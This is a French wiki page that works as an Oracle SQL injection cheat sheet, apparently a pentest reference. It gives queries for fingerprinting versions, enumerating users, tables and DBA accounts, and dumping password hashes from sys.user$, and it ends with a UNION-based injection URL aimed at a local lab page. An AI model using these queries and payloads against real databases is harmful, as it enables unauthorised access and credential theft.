1.1 Exemples pratiques PL/SQL

De UnixWiki
Version datée du 26 avril 2012 à 16:20 par Futex (discussion | contributions) (Page créée avec « Version SELECT banner FROM v$version WHERE banner LIKE ‘Oracle%’; SELECT banner FROM v$version WHERE banner LIKE ‘TNS%’; SELECT version FROM v$instance; Cu… »)
(diff) ← Version précédente | Voir la version actuelle (diff) | Version suivante → (diff)
Aller à la navigation Aller à la recherche

Version 

 SELECT banner FROM v$version WHERE banner LIKE ‘Oracle%’;
 SELECT banner FROM v$version WHERE banner LIKE ‘TNS%’;
 SELECT version FROM v$instance;

Current User 

 SELECT user FROM dual

List Users 

 SELECT username FROM all_users ORDER BY username;
 SELECT name FROM sys.user$; — priv

List Password Hashes 

 SELECT name, password, astatus FROM sys.user$ — priv, <= 10g.  astatus tells you if acct is locked
 SELECT name,spare4 FROM sys.user$ — priv, 11g

List DBA Accounts 

 SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = ‘YES’; — priv, list DBAs, DBA roles

List Databases 

 SELECT DISTINCT owner FROM all_tables; — list schemas (one per user)
 – Also query TNS listener for other databases.  See tnscmd (services | status).

List Columns 

 SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’;
 SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’ and owner = ‘foo’;

List Tables 

 SELECT table_name FROM all_tables;
 SELECT owner, table_name FROM all_tables;

String Concatenation 

 SELECT ‘A’ || ‘B’ FROM dual; — returns AB

Location of DB files 

 SELECT name FROM V$DATAFILE;

Default/System Databases 

 SYSTEM
 SYSAUX

Exemple d'intégration listant les users 

 http://127.0.0.1/sqlinjection/ora.php?id=-101%20UNION%20ALL%20SELECT%20(SELECT%20user%20FROM%20dual)%20FROM%20DUAL
Récupérée de « https://futex.re/mediawiki/index.php?title=1.1_Exemples_pratiques_PL/SQL&oldid=1183 »